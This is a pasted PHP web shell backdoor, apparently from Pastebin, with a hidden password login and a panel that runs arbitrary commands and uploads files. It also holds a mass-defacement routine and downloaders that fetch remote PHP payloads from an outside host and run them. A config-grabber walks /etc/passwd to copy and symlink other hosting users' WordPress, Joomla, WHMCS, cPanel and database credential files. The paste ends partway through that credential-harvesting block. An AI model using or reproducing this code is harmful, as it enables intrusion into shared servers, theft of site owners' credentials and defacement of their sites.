AZZATSSINS_CYBERSERK

SIMPLE WEB5HELL BACKDOOR V2.9

May 5th, 2016
564
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 98.68 KB | None | 0 0
  1. <?php
  2. /*
  3. Simple Web5Hell Linux/Unix By © AZZATSSINS CYBERSERKERS
  4. Login Page: file.php?god=damn
  5. Default Password: A/Z
  6. You Can ReCoded But Don't Change CopyRight
  7. example: ReCoded By XXXXX & © AZZATSSINS
  8. */
  9. $auth_pass = "ed4544d345562697a49e5cfc6a8ab545";
  10. $color = "#00ff00";
  11. $default_action = 'FilesMan';
  12. @define('SELF_PATH', __FILE__);
  13. if( strpos($_SERVER['HTTP_USER_AGENT'],'Google') !== false ) {
  14.     header('HTTP/1.0 403');
  15.     exit;
  16. }
  17. @session_start();
  18. @error_reporting(0);
  19. @ini_set('error_log',NULL);
  20. @ini_set('log_errors',0);
  21. @ini_set('max_execution_time',0);
  22. @ini_set('display_errors', 0);
  23. @set_time_limit(0);
  24. @set_magic_quotes_runtime(0);
  25. @define('VERSION', '2.1');
  26. if( get_magic_quotes_gpc() ) {
  27.     function stripslashes_array($array) {
  28.         return is_array($array) ? array_map('stripslashes_array', $array) : stripslashes($array);
  29.     }
  30.     $_POST = stripslashes_array($_POST);
  31. }
  32. function echoLogin() {
  33. header('HTTP/1.0 404 Not Found');
  34. if($_GET['god']=="damn"){
  35. echo'<style>
  36.        input { margin:0;background-color:#fff;border:1px solid #fff; }
  37.    </style>
  38.    <center>
  39.    <input type=password name=lol><br>
  40.    <input type=password name=lol><br>
  41.    <input type=password name=lol><br>
  42.    <input type=password name=lol><br>
  43.    <form method=post>
  44.    <input type=password name=pass>
  45.    </form><br>
  46.    <input type=password name=lol><br>
  47.    <input type=password name=lol><br>
  48.    <input type=password name=lol><br>
  49.    <input type=password name=lol><br>
  50.    </center>';
  51.     }
  52.     exit;
  53. }
  54. if( !isset( $_SESSION[md5($_SERVER['HTTP_HOST'])] ))
  55.     if( empty( $auth_pass ) ||
  56.         ( isset( $_POST['pass'] ) && ( md5($_POST['pass']) == $auth_pass ) ) )
  57.         $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
  58.     else
  59.         echoLogin();
  60.  
  61. @error_reporting(0);
  62. @ini_set('output_buffering',0);
  63. @ini_set('display_errors', 0);
  64. @ini_set('log_errors',0);
  65. /*
  66. SIMPLE WEB5HELL V3.2
  67. Script Edited By AZZATSSINS CYBERSERKERS (Editor/Author)
  68. Email : Cyberserkers@gmail.com
  69. Twitter : @AZZATSSINS
  70. Facebook: /AZZATSSINS.CYBERSERKERS
  71. VK: /azzatssins
  72. Dont Change ©Author/Editor® ^_^
  73. */
  74. echo "<title>SIMPLE WEB5HELL</title><body bgcolor=silver><center><br><div style='background:#d400f4;margin:0px;padding:26px;text-align:center;color:#202020;'><b><i><div style='background:red;margin:0px;padding:8px;text-align:center;color:white;'>[<a href='?'>HOME</a>] [<a href='?whmcs=decode'>WHMCS DECODER</a>] [<a href='?WHMCS=REMOTE'>WHMCS REMOTE</a>] [<a href='?whmcs=shell'>WHMCS INJECT</a>] [<a href='?whmcs=client'>WHMCS CLIENT</a>] [<a href='?ceck=whmcs'>WHMCS CECK</a>] [<a href='?whmcs=token'>BYPASS TOKEN</a>] [<a href='?AZZATSSINS=CONFIGRABBER'>CONFIG</a>]</div><br><div style='background:silver;margin:0px;padding:10px;text-align:center;color:red;'>[<a href='?AZZATSSINS=encrypt'>ENCRYPTIONS</a>] [<a href='?md5=decrypter'>DECRYPTIONS</a>] [<a href='?open=ports'>OPEN PORT</a>] [<a href='?AZZATSSINS=JPASS'>JOOMLA LOGIN</a>] [<a href='?AZZATSSINS=WPASS'>WORDPRESS LOGIN</a>] [<a href='?traindt=login'>TRAINDT LOGIN</a>] [<a href='?nuke=login'>NUKE LOGIN</a>] [<a href='?AZZATSSINS=BOMAIL'>BOMAIL</a>] [<a href='?auto=tools'>TOOLS</a>]</div><br><div style='background:lime;margin:0px;padding:10px;text-align:center;color:#202020;'><form method='POST'><input type='submit' name='azzatssins1' value='CONFIG'> <input type='submit' name='azzatssins' value='WHMCS DECODE'> <input type='submit' name='azzatssins2' value='JUMPING'> <input type='submit' name='azzatssins3' value='SYMLINK 01'> <input type='submit' name='azzatssins4' value='SYMLINK 02'> <input type='submit' name='azzatssins5' value='BYPASS FUN'> <input type='submit' name='azzatssins6' value='MYSQL'> <input type='submit' name='azzatssins7' value='SERVER VULN'> <input type='submit' name='azzatssins9' value='MASSDEFACE'> <input type='submit' name='azzatssins8' value='HIDE UR ASS'></i></b><br></form></div>";
  75. $currentWD  = str_replace("\\\\","\\",$_POST['_cwd']);
  76. $currentCMD = str_replace("\\\\","\\",$_POST['_cmd']);
  77.  
  78. $UName  = `uname -a`;
  79. $SCWD   = `pwd`;
  80. $UserID = `id`;
  81.  
  82. if( $currentWD == "" ) {
  83.     $currentWD = $SCWD;
  84. }
  85.  
  86.  
  87. if( $_POST['_act'] == "List files!" ) {
  88.     $currentCMD = "ls -la";
  89. }
  90.  
  91. echo "<div style='background:orange;margin:0px;padding:26px;text-align:center;color:#202020;'><br><form method=post enctype=\"multipart/form-data\"><table>";
  92.  
  93. echo "<tr><td><b>Execute command:</b></td><td><input size=30 name=\"_cmd\" value=\"".$currentCMD."\"></td>";
  94. echo "<td><input type=submit name=_act value=\"Execute!\"></td></tr>";
  95.  
  96. echo "<tr><td><b>Change directory:</b></td><td><input size=30 name=\"_cwd\" value=\"".$currentWD."\"></td>";
  97. echo "<td><input type=submit name=_act value=\"List files!\"></td></tr>";
  98.  
  99. echo "<tr><td><b>Upload file:</b></td><td><input size=15 type=file name=_upl></td>";
  100. echo "<td><input type=submit name=_act value=\"Upload!\"></td></tr>";
  101.  
  102. echo "</table></form>";
  103. echo"</div><br><br></div></center>";
  104.  
  105. if($_POST['azzatssins9']){
  106.  ?>
  107. <br><center><b><i><form ENCTYPE="multipart/form-data" method=post>
  108. Folder : <input typ=text name=path size=20 value="<?=getcwd();?>">
  109. <br>
  110. Nama File : <input typ=text name=file size=20 value="index.htm">
  111. <br>URL Script :
  112. <input typ=text name=url size=30 value="http://wget.yu.tl/files/lol.css">
  113. <br>
  114. <input type=submit value=Deface>
  115. </form></i></b></center>
  116. <?php
  117.  $path=$_POST[path];
  118.  $file=$_POST[file];
  119.  $script=$_POST[url];
  120.  $dir=opendir("$path");
  121.  while($row=readdir($dir))
  122.  {
  123.  $start=@fopen("$row/$file","w+");
  124.  $code=@file_get_contents($script);
  125.  $finish=@fwrite($start,$code);
  126.  if ($finish)
  127.  {
  128.  echo "$row/$file > Done<br><br>";
  129.  }
  130. } /*MassDeface by AZZATSSINS*/
  131. }
  132. if($_POST['azzatssins']){
  133. $get = file_get_contents('http://wget.yu.tl/files/wd.css');
  134. $bwt = fopen('wd.php', 'w');
  135. fwrite($bwt,$get);
  136. fclose($bwt);
  137. echo'<meta http-equiv="Refresh" content= "0; url=wd.php">';
  138.  }
  139. if($_POST['azzatssins1']){
  140. /*Simple Config Grabber With Copy File Method By AZZATSSINS CYBERSERKERS*/
  141. //$us = file_get_contents("/etc/passwd");
  142. $usa = fopen('/etc/passwd','r');
  143. $dir = mkdir('AZZATSSINS', 0777);
  144. $rrrr = "Options all \n DirectoryIndex AZZATSSINS \n Require None \n Satisfy Any";
  145. $frr = fopen('AZZATSSINS/.htaccess', 'w');
  146. fwrite($frr, $rrrr);
  147. while($us = fgets($usa)){
  148.  if($us==""){
  149.  echo "<font color=red>can't read /etc/passwd</font>";
  150.  }
  151. else{
  152.  preg_match_all('/(.*?):x:/', $us, $user_byk);
  153.  foreach($user_byk[1] as $user){
  154.  $dir1 = "/home/$user/public_html/";
  155. if(is_readable($dir1)){
  156.  
  157. system('cp '.$dir1.'wp-config.php AZZATSSINS/'.$user.'-WPS.txt');
  158. system('cp '.$dir1.'configuration.php AZZATSSINS/'.$user.'-CMS.txt');
  159. system('cp '.$dir1.'config.php AZZATSSINS/'.$user.'-ETC.txt');
  160. system('cp /home/'.$user.'/.my.cnf AZZATSSINS/'.$user.'-CP.txt');
  161. system('cp /home/'.$user.'/.accesshash AZZATSSINS/'.$user.'-WHM.txt');
  162. }
  163. else{
  164.     }
  165. }
  166. }
  167.  
  168. } system('rm AZZATSSINS/.htaccess');
  169.  
  170. echo'<meta http-equiv="Refresh" content= "0; url=AZZATSSINS">'; }
  171.  
  172. if($_GET['WHMCS']=="REMOTE"){
  173. $get = file_get_contents('http://wget.yu.tl/files/ah.css');
  174. $bwt = fopen('rw.php', 'w');
  175. fwrite($bwt,$get);
  176. fclose($bwt);
  177. echo'<meta http-equiv="Refresh" content= "0; url=rw.php">';
  178. }
  179.  
  180. if($_GET['AZZATSSINS']=="CONFIGRABBER"){
  181.  ?>
  182. <title>ConfiGrabber V3.2 by AZZATSSINS</title><body bgcolor=silver><center><div style=background:black;margin:0px;padding:4px;text-align:center;color:silver;><i><b><font color=lime>&copy; </font><a href=mailto:cyberserkers@gmail.com>AZZATSSINS CYBERSERKERS</a></b></i></div><br><br><br><form method="post"><input type="hidden" cols="100" rows="100" name="passwd" value="<?php $usr=file("/etc/passwd"); foreach($usr as $usrr) { $str=explode(":",$usrr); echo $str[0]."\n"; } ?>
  183. "><br>Your Folder  : <input type="text" class="input" name="folfig" size="10" value="CONFIGRAB">
  184. <input style="background:dodgerblue;margin:1px;width:15%;padding:0px;color:#fff;border:0;font-weight:bold;" name="conf" class="ipt" value="EXECUTE" type="submit"><br><br></form></center>
  185. <?php @ini_set('html_errors',0); @ini_set('max_execution_time',0); @ini_set('display_errors', 0); @ini_set('file_uploads',1);
  186. if ($_POST['conf']) {
  187. $folfig = $_POST['folfig'];
  188. $functions=@ini_get("disable_functions"); if(eregi("symlink",$functions)){die ('<font color=red>Symlnk Has Been Disable...!!!</font>');}
  189. @mkdir($folfig, 0755);
  190. @chdir($folfig);
  191. $htaccess="Options Indexes FollowSymLinks\nDirectoryIndex azzatssins.cyberserkers\nAddType txt .php\nAddHandler txt .php";
  192. file_put_contents(".htaccess",$htaccess,FILE_APPEND);
  193. $passwd=explode("\n",$_POST["passwd"]);
  194. foreach($passwd as $pwd){ $user=trim($pwd);
  195. symlink('/','000~ROOT~000');
  196. copy('/home/'.$user.'/.my.cnf',$user.' <~ CPANEL');
  197. symlink('/home/'.$user.'/.my.cnf',$user.' <~ CPANEL');
  198. copy('/home/'.$user.'/.accesshash',$user.' <~ WHMCS.txt');
  199. symlink('/home/'.$user.'/.accesshash',$user.' <~ WHMCS.txt');
  200. copy('/home/'.$user.'/public_html/suspended.page/index.html',$user.' <~ RESELLER.txt');
  201. symlink('/home/'.$user.'/public_html/suspended.page/index.html',$user.' <~ RESELLER.txt');
  202. symlink('/home/'.$user.'/public_html/.accesshash',$user.' <~ RESELLER.txt');
  203. copy('/home/'.$user.'/public_html/wp-config.php',$user.' <~ WORDPRESS.txt');
  204. copy('/home/'.$user.'/public_html/configuration.php',$user.' <~ WHMCS or JOOMLA.txt');
  205. copy('/home/'.$user.'/public_html/account/configuration.php',$user.' <~ WHMCS.txt');
  206. copy('/home/'.$user.'/public_html/accounts/configuration.php',$user.' <~ WHMCS.txt');
  207. copy('/home/'.$user.'/public_html/buy/configuration.php',$user.' <~ WHMCS.txt');
  208. copy('/home/'.$user.'/public_html/checkout/configuration.php',$user.' <~ WHMCS.txt');
  209. copy('/home/'.$user.'/public_html/central/configuration.php',$user.' <~ WHMCS.txt');
  210. copy('/home/'.$user.'/public_html/clienti/configuration.php',$user.' <~ WHMCS.txt');
  211. copy('/home/'.$user.'/public_html/client/configuration.php',$user.' <~ WHMCS.txt');
  212. copy('/home/'.$user.'/public_html/cliente/configuration.php',$user.' <~ WHMCS.txt');
  213. copy('/home/'.$user.'/public_html/clientes/configuration.php',$user.' <~ WHMCS.txt');
  214. copy('/home/'.$user.'/public_html/clients/configuration.php',$user.' <~ WHMCS.txt');
  215. copy('/home/'.$user.'/public_html/clientarea/configuration.php',$user.' <~ WHMCS.txt');
  216. copy('/home/'.$user.'/public_html/clientsarea/configuration.php',$user.' <~ WHMCS.txt');
  217. copy('/home/'.$user.'/public_html/client-area/configuration.php',$user.' <~ WHMCS.txt');
  218. copy('/home/'.$user.'/public_html/clients-area/configuration.php',$user.' <~ WHMCS.txt');
  219. copy('/home/'.$user.'/public_html/clientzone/configuration.php',$user.' <~ WHMCS.txt');
  220. copy('/home/'.$user.'/public_html/client-zone/configuration.php',$user.' <~ WHMCS.txt');
  221. copy('/home/'.$user.'/public_html/core/configuration.php',$user.' <~ WHMCS.txt');
  222. copy('/home/'.$user.'/public_html/company/configuration.php',$user.' <~ WHMCS.txt');
  223. copy('/home/'.$user.'/public_html/customer/configuration.php',$user.' <~ WHMCS.txt');
  224. copy('/home/'.$user.'/public_html/customers/configuration.php',$user.' <~ WHMCS.txt');
  225. copy('/home/'.$user.'/public_html/bill/configuration.php',$user.' <~ WHMCS.txt');
  226. copy('/home/'.$user.'/public_html/billing/configuration.php',$user.' <~ WHMCS.txt');
  227. copy('/home/'.$user.'/public_html/finance/configuration.php',$user.' <~ WHMCS.txt');
  228. copy('/home/'.$user.'/public_html/financeiro/configuration.php',$user.' <~ WHMCS.txt');
  229. copy('/home/'.$user.'/public_html/host/configuration.php',$user.' <~ WHMCS.txt');
  230. copy('/home/'.$user.'/public_html/hosts/configuration.php',$user.' <~ WHMCS.txt');
  231. copy('/home/'.$user.'/public_html/hosting/configuration.php',$user.' <~ WHMCS.txt');
  232. copy('/home/'.$user.'/public_html/hostings/configuration.php',$user.' <~ WHMCS.txt'-26);
  233. copy('/home/'.$user.'/public_html/klien/configuration.php',$user.' <~ WHMCS.txt');
  234. copy('/home/'.$user.'/public_html/manage/configuration.php',$user.' <~ WHMCS.txt');
  235. copy('/home/'.$user.'/public_html/manager/configuration.php',$user.' <~ WHMCS.txt');
  236. copy('/home/'.$user.'/public_html/member/configuration.php',$user.' <~ WHMCS.txt');
  237. copy('/home/'.$user.'/public_html/members/configuration.php',$user.' <~ WHMCS.txt');
  238. copy('/home/'.$user.'/public_html/my/configuration.php',$user.' <~ WHMCS.txt');
  239. copy('/home/'.$user.'/public_html/myaccount/configuration.php',$user.' <~ WHMCS.txt');
  240. copy('/home/'.$user.'/public_html/my-account/client/configuration.php',$user.' <~ WHMCS.txt');
  241. copy('/home/'.$user.'/public_html/myaccounts/configuration.php',$user.' <~ WHMCS.txt');
  242. copy('/home/'.$user.'/public_html/my-accounts/configuration.php',$user.' <~ WHMCS.txt');
  243. copy('/home/'.$user.'/public_html/order/configuration.php',$user.' <~ WHMCS.txt');
  244. copy('/home/'.$user.'/public_html/orders/configuration.php',$user.' <~ WHMCS.txt');
  245. copy('/home/'.$user.'/public_html/painel/configuration.php',$user.' <~ WHMCS.txt');
  246. copy('/home/'.$user.'/public_html/panel/configuration.php',$user.' <~ WHMCS.txt');
  247. copy('/home/'.$user.'/public_html/panels/configuration.php',$user.' <~ WHMCS.txt');
  248. copy('/home/'.$user.'/public_html/portal/configuration.php',$user.' <~ WHMCS.txt');
  249. copy('/home/'.$user.'/public_html/portals/configuration.php',$user.' <~ WHMCS.txt');
  250. copy('/home/'.$user.'/public_html/purchase/configuration.php',$user.' <~ WHMCS.txt');
  251.  
  252. copy('/home/'.$user.'/public_html/secure/configuration.php',$user.' <~ WHMCS.txt');
  253. copy('/home/'.$user.'/public_html/support/configuration.php',$user.' <~ WHMCS.txt');
  254. copy('/home/'.$user.'/public_html/supporte/configuration.php',$user.' <~ WHMCS.txt');
  255. copy('/home/'.$user.'/public_html/supports/configuration.php',$user.' <~ WHMCS.txt');
  256. copy('/home/'.$user.'/public_html/web/configuration.php',$user.' <~ WHMCS.txt');
  257. copy('/home/'.$user.'/public_html/webhost/configuration.php',$user.' <~ WHMCS.txt');
  258. copy('/home/'.$user.'/public_html/webhosting/configuration.php',$user.' <~ WHMCS.txt');
  259. copy('/home/'.$user.'/public_html/whm/configuration.php',$user.' <~ WHMCS.txt');
  260. copy('/home/'.$user.'/public_html/whmcs/configuration.php',$user.' <~ WHMCS.txt');
  261. copy('/home/'.$user.'/public_html/whmcs2/configuration.php',$user.' <~ WHMCS.txt');
  262. copy('/home/'.$user.'/public_html/Whm/configuration.php',$user.' <~ WHMCS.txt');
  263. copy('/home/'.$user.'/public_html/Whmcs/configuration.php',$user.' <~ WHMCS.txt');
  264. copy('/home/'.$user.'/public_html/WHM/configuration.php',$user.' <~ WHMCS.txt');
  265. copy('/home/'.$user.'/public_html/WHMCS/configuration.php',$user.' <~ WHMCS.txt');
  266. symlink('/home/'.$user.'/public_html/wp-config.php',$user.' <~ WORDPRESS.txt');
  267. symlink('/home/'.$user.'/public_html/configuration.php',$user.' <~ WHMCS or JOOMLA.txt');
  268. symlink('/home/'.$user.'/public_html/account/configuration.php',$user.' <~ WHMCS.txt');
  269. symlink('/home/'.$user.'/public_html/accounts/configuration.php',$user.' <~ WHMCS.txt');
  270. symlink('/home/'.$user.'/public_html/buy/configuration.php',$user.' <~ WHMCS.txt');
  271. symlink('/home/'.$user.'/public_html/checkout/configuration.php',$user.' <~ WHMCS.txt');
  272. symlink('/home/'.$user.'/public_html/central/configuration.php',$user.' <~ WHMCS.txt');
  273. symlink('/home/'.$user.'/public_html/clienti/configuration.php',$user.' <~ WHMCS.txt');
  274. symlink('/home/'.$user.'/public_html/client/configuration.php',$user.' <~ WHMCS.txt');
  275. symlink('/home/'.$user.'/public_html/cliente/configuration.php',$user.' <~ WHMCS.txt');
  276. symlink('/home/'.$user.'/public_html/clientes/configuration.php',$user.' <~ WHMCS.txt');
  277. symlink('/home/'.$user.'/public_html/clients/configuration.php',$user.' <~ WHMCS.txt');
  278. symlink('/home/'.$user.'/public_html/clientarea/configuration.php',$user.' <~ WHMCS.txt');
  279. symlink('/home/'.$user.'/public_html/clientsarea/configuration.php',$user.' <~ WHMCS.txt');
  280. symlink('/home/'.$user.'/public_html/client-area/configuration.php',$user.' <~ WHMCS.txt');
  281. symlink('/home/'.$user.'/public_html/clients-area/configuration.php',$user.' <~ WHMCS.txt');
  282. symlink('/home/'.$user.'/public_html/clientzone/configuration.php',$user.' <~ WHMCS.txt');
  283. symlink('/home/'.$user.'/public_html/client-zone/configuration.php',$user.' <~ WHMCS.txt');
  284. symlink('/home/'.$user.'/public_html/core/configuration.php',$user.' <~ WHMCS.txt');
  285. symlink('/home/'.$user.'/public_html/company/configuration.php',$user.' <~ WHMCS.txt');
  286. symlink('/home/'.$user.'/public_html/customer/configuration.php',$user.' <~ WHMCS.txt');
  287. symlink('/home/'.$user.'/public_html/customers/configuration.php',$user.' <~ WHMCS.txt');
  288. symlink('/home/'.$user.'/public_html/bill/configuration.php',$user.' <~ WHMCS.txt');
  289. symlink('/home/'.$user.'/public_html/billing/configuration.php',$user.' <~ WHMCS.txt');
  290. symlink('/home/'.$user.'/public_html/finance/configuration.php',$user.' <~ WHMCS.txt');
  291. symlink('/home/'.$user.'/public_html/financeiro/configuration.php',$user.' <~ WHMCS.txt');
  292. symlink('/home/'.$user.'/public_html/host/configuration.php',$user.' <~ WHMCS.txt');
  293. symlink('/home/'.$user.'/public_html/hosts/configuration.php',$user.' <~ WHMCS.txt');
  294. symlink('/home/'.$user.'/public_html/hosting/configuration.php',$user.' <~ WHMCS.txt');
  295. symlink('/home/'.$user.'/public_html/hostings/configuration.php',$user.' <~ WHMCS.txt'-26);
  296. symlink('/home/'.$user.'/public_html/klien/configuration.php',$user.' <~ WHMCS.txt');
  297. symlink('/home/'.$user.'/public_html/manage/configuration.php',$user.' <~ WHMCS.txt');
  298. symlink('/home/'.$user.'/public_html/manager/configuration.php',$user.' <~ WHMCS.txt');
  299. symlink('/home/'.$user.'/public_html/member/configuration.php',$user.' <~ WHMCS.txt');
  300. symlink('/home/'.$user.'/public_html/members/configuration.php',$user.' <~ WHMCS.txt');
  301. symlink('/home/'.$user.'/public_html/my/configuration.php',$user.' <~ WHMCS.txt');
  302. symlink('/home/'.$user.'/public_html/myaccount/configuration.php',$user.' <~ WHMCS.txt');
  303. symlink('/home/'.$user.'/public_html/my-account/client/configuration.php',$user.' <~ WHMCS.txt');
  304. symlink('/home/'.$user.'/public_html/myaccounts/configuration.php',$user.' <~ WHMCS.txt');
  305. symlink('/home/'.$user.'/public_html/my-accounts/configuration.php',$user.' <~ WHMCS.txt');
  306. symlink('/home/'.$user.'/public_html/order/configuration.php',$user.' <~ WHMCS.txt');
  307. symlink('/home/'.$user.'/public_html/orders/configuration.php',$user.' <~ WHMCS.txt');
  308. symlink('/home/'.$user.'/public_html/painel/configuration.php',$user.' <~ WHMCS.txt');
  309. symlink('/home/'.$user.'/public_html/panel/configuration.php',$user.' <~ WHMCS.txt');
  310. symlink('/home/'.$user.'/public_html/panels/configuration.php',$user.' <~ WHMCS.txt');
  311. symlink('/home/'.$user.'/public_html/portal/configuration.php',$user.' <~ WHMCS.txt');
  312. symlink('/home/'.$user.'/public_html/portals/configuration.php',$user.' <~ WHMCS.txt');
  313. symlink('/home/'.$user.'/public_html/purchase/configuration.php',$user.' <~ WHMCS.txt');
  314.  
  315. symlink('/home/'.$user.'/public_html/secure/configuration.php',$user.' <~ WHMCS.txt');
  316. symlink('/home/'.$user.'/public_html/support/configuration.php',$user.' <~ WHMCS.txt');
  317. symlink('/home/'.$user.'/public_html/supporte/configuration.php',$user.' <~ WHMCS.txt');
  318. symlink('/home/'.$user.'/public_html/supports/configuration.php',$user.' <~ WHMCS.txt');
  319. symlink('/home/'.$user.'/public_html/web/configuration.php',$user.' <~ WHMCS.txt');
  320. symlink('/home/'.$user.'/public_html/webhost/configuration.php',$user.' <~ WHMCS.txt');
  321. symlink('/home/'.$user.'/public_html/webhosting/configuration.php',$user.' <~ WHMCS.txt');
  322. symlink('/home/'.$user.'/public_html/whm/configuration.php',$user.' <~ WHMCS.txt');
  323. symlink('/home/'.$user.'/public_html/whmcs/configuration.php',$user.' <~ WHMCS.txt');
  324. symlink('/home/'.$user.'/public_html/whmcs2/configuration.php',$user.' <~ WHMCS.txt');
  325. symlink('/home/'.$user.'/public_html/Whm/configuration.php',$user.' <~ WHMCS.txt');
  326. symlink('/home/'.$user.'/public_html/Whmcs/configuration.php',$user.' <~ WHMCS.txt');
  327. symlink('/home/'.$user.'/public_html/WHM/configuration.php',$user.' <~ WHMCS.txt');
  328. symlink('/home/'.$user.'/public_html/WHMCS/configuration.php',$user.' <~ WHMCS.txt');
  329. symlink('/home/'.$user.'/public_html/vb/includes/config.php',$user.' <~ VBULLETIN.txt');
  330. symlink('/home/'.$user.'/public_html/includes/config.php',$user.' <~ VBULLETIN.txt');
  331. symlink('/home/'.$user.'/public_html/forum/includes/config.php',$user.' <~ VBULLETIN.txt');
  332. symlink('/home/'.$user.'/public_html/forums/includes/config.php',$user.' <~ VBULLETIN.txt');
  333. symlink('/home/'.$user.'/public_html/cc/includes/config.php',$user.' <~ VBULLETIN.txt');
  334. symlink('/home/'.$user.'/public_html/inc/config.php',$user.'-MyBB.txt');
  335. symlink('/home/'.$user.'/public_html/includes/configure.php',$user.' <~ OSCOMMERCE.txt');
  336. symlink('/home/'.$user.'/public_html/shop/includes/configure.php',$user.' <~ OSCOMMERCE.txt');
  337. symlink('/home/'.$user.'/public_html/os/includes/configure.php',$user.' <~ OSCOMMERCE.txt');
  338. symlink('/home/'.$user.'/public_html/oscom/includes/configure.php',$user.' <~ OSCOMMERCE.txt');
  339. symlink('/home/'.$user.'/public_html/products/includes/configure.php',$user.' <~ OSCOMMERCE.txt');
  340. symlink('/home/'.$user.'/public_html/cart/includes/configure.php',$user.' <~ OSCOMMERCE.txt');
  341. symlink('/home/'.$user.'/public_html/inc/conf_global.php',$user.'-IPB.txt');
  342. copy('/home/'.$user.'/public_html/wp/test/wp-config.php',$user.' <~ WORDPRESS.txt');
  343. copy('/home/'.$user.'/public_html/blog/wp-config.php',$user.' <~ WORDPRESS.txt');
  344. copy('/home/'.$user.'/public_html/beta/wp-config.php',$user.' <~ WORDPRESS.txt');
  345. copy('/home/'.$user.'/public_html/portal/wp-config.php',$user.' <~ WORDPRESS.txt');
  346. copy('/home/'.$user.'/public_html/site/wp-config.php',$user.' <~ WORDPRESS.txt');
  347. copy('/home/'.$user.'/public_html/wp/wp-config.php',$user.' <~ WORDPRESS.txt');
  348. copy('/home/'.$user.'/public_html/WP/wp-config.php',$user.' <~ WORDPRESS.txt');
  349. copy('/home/'.$user.'/public_html/news/wp-config.php',$user.' <~ WORDPRESS.txt');
  350. copy('/home/'.$user.'/public_html/wordpress/wp-config.php',$user.' <~ WORDPRESS.txt');
  351. copy('/home/'.$user.'/public_html/test/wp-config.php',$user.' <~ WORDPRESS.txt');
  352. copy('/home/'.$user.'/public_html/demo/wp-config.php',$user.' <~ WORDPRESS.txt');
  353. copy('/home/'.$user.'/public_html/home/wp-config.php',$user.' <~ WORDPRESS.txt');
  354. copy('/home/'.$user.'/public_html/v1/wp-config.php',$user.' <~ WORDPRESS.txt');
  355. copy('/home/'.$user.'/public_html/v2/wp-config.php',$user.' <~ WORDPRESS.txt');
  356. copy('/home/'.$user.'/public_html/press/wp-config.php',$user.' <~ WORDPRESS.txt');
  357. copy('/home/'.$user.'/public_html/new/wp-config.php',$user.' <~ WORDPRESS.txt');
  358. copy('/home/'.$user.'/public_html/blogs/wp-config.php',$user.' <~ WORDPRESS.txt');
  359. copy('/home/'.$user.'/public_html/blog/configuration.php',$user.' <~ JOOMLA.txt');
  360. copy('/home/'.$user.'/public_html/submitticket.php',$user.' <~ WHMCS.txt');
  361. copy('/home/'.$user.'/public_html/cms/configuration.php',$user.' <~ JOOMLA.txt');
  362. copy('/home/'.$user.'/public_html/beta/configuration.php',$user.' <~ JOOMLA.txt');
  363. copy('/home/'.$user.'/public_html/portal/configuration.php',$user.' <~ JOOMLA.txt');
  364. copy('/home/'.$user.'/public_html/site/configuration.php',$user.' <~ JOOMLA.txt');
  365. copy('/home/'.$user.'/public_html/main/configuration.php',$user.' <~ JOOMLA.txt');
  366. copy('/home/'.$user.'/public_html/home/configuration.php',$user.' <~ JOOMLA.txt');
  367. copy('/home/'.$user.'/public_html/demo/configuration.php',$user.' <~ JOOMLA.txt');
  368. copy('/home/'.$user.'/public_html/test/configuration.php',$user.' <~ JOOMLA.txt');
  369. copy('/home/'.$user.'/public_html/v1/configuration.php',$user.' <~ JOOMLA.txt');
  370. copy('/home/'.$user.'/public_html/v2/configuration.php',$user.' <~ JOOMLA.txt');
  371. copy('/home/'.$user.'/public_html/joomla/configuration.php',$user.' <~ JOOMLA.txt');
  372. copy('/home/'.$user.'/public_html/new/configuration.php',$user.' <~ JOOMLA.txt');
  373. symlink('/home/'.$user.'/public_html/wp/test/wp-config.php',$user.' <~ WORDPRESS.txt');
  374. symlink('/home/'.$user.'/public_html/blog/wp-config.php',$user.' <~ WORDPRESS.txt');
  375. symlink('/home/'.$user.'/public_html/beta/wp-config.php',$user.' <~ WORDPRESS.txt');
  376. symlink('/home/'.$user.'/public_html/portal/wp-config.php',$user.' <~ WORDPRESS.txt');
  377. symlink('/home/'.$user.'/public_html/site/wp-config.php',$user.' <~ WORDPRESS.txt');
  378. symlink('/home/'.$user.'/public_html/wp/wp-config.php',$user.' <~ WORDPRESS.txt');
  379. symlink('/home/'.$user.'/public_html/WP/wp-config.php',$user.' <~ WORDPRESS.txt');
  380. symlink('/home/'.$user.'/public_html/news/wp-config.php',$user.' <~ WORDPRESS.txt');
  381. symlink('/home/'.$user.'/public_html/wordpress/wp-config.php',$user.' <~ WORDPRESS.txt');
  382. symlink('/home/'.$user.'/public_html/test/wp-config.php',$user.' <~ WORDPRESS.txt');
  383. symlink('/home/'.$user.'/public_html/demo/wp-config.php',$user.' <~ WORDPRESS.txt');
  384. symlink('/home/'.$user.'/public_html/home/wp-config.php',$user.' <~ WORDPRESS.txt');
  385. symlink('/home/'.$user.'/public_html/v1/wp-config.php',$user.' <~ WORDPRESS.txt');
  386. symlink('/home/'.$user.'/public_html/v2/wp-config.php',$user.' <~ WORDPRESS.txt');
  387. symlink('/home/'.$user.'/public_html/press/wp-config.php',$user.' <~ WORDPRESS.txt');
  388. symlink('/home/'.$user.'/public_html/new/wp-config.php',$user.' <~ WORDPRESS.txt');
  389. symlink('/home/'.$user.'/public_html/blogs/wp-config.php',$user.' <~ WORDPRESS.txt');
  390. /*You Can ReCoded But Don't Change ©CopyRight*/
  391. /*e.g: Recoded By xxxxxx & © AZZATSSINS*/
  392. symlink('/home/'.$user.'/public_html/blog/configuration.php',$user.' <~ JOOMLA.txt');
  393. symlink('/home/'.$user.'/public_html/submitticket.php',$user.' <~ WHMCS.txt');
  394. symlink('/home/'.$user.'/public_html/cms/configuration.php',$user.' <~ JOOMLA.txt');
  395. symlink('/home/'.$user.'/public_html/beta/configuration.php',$user.' <~ JOOMLA.txt');
  396. symlink('/home/'.$user.'/public_html/portal/configuration.php',$user.' <~ JOOMLA.txt');
  397. symlink('/home/'.$user.'/public_html/site/configuration.php',$user.' <~ JOOMLA.txt');
  398. symlink('/home/'.$user.'/public_html/main/configuration.php',$user.' <~ JOOMLA.txt');
  399. symlink('/home/'.$user.'/public_html/home/configuration.php',$user.' <~ JOOMLA.txt');
  400. symlink('/home/'.$user.'/public_html/demo/configuration.php',$user.' <~ JOOMLA.txt');
  401. symlink('/home/'.$user.'/public_html/test/configuration.php',$user.' <~ JOOMLA.txt');
  402. symlink('/home/'.$user.'/public_html/v1/configuration.php',$user.' <~ JOOMLA.txt');
  403. symlink('/home/'.$user.'/public_html/v2/configuration.php',$user.' <~ JOOMLA.txt');
  404. symlink('/home/'.$user.'/public_html/joomla/configuration.php',$user.' <~ JOOMLA.txt');
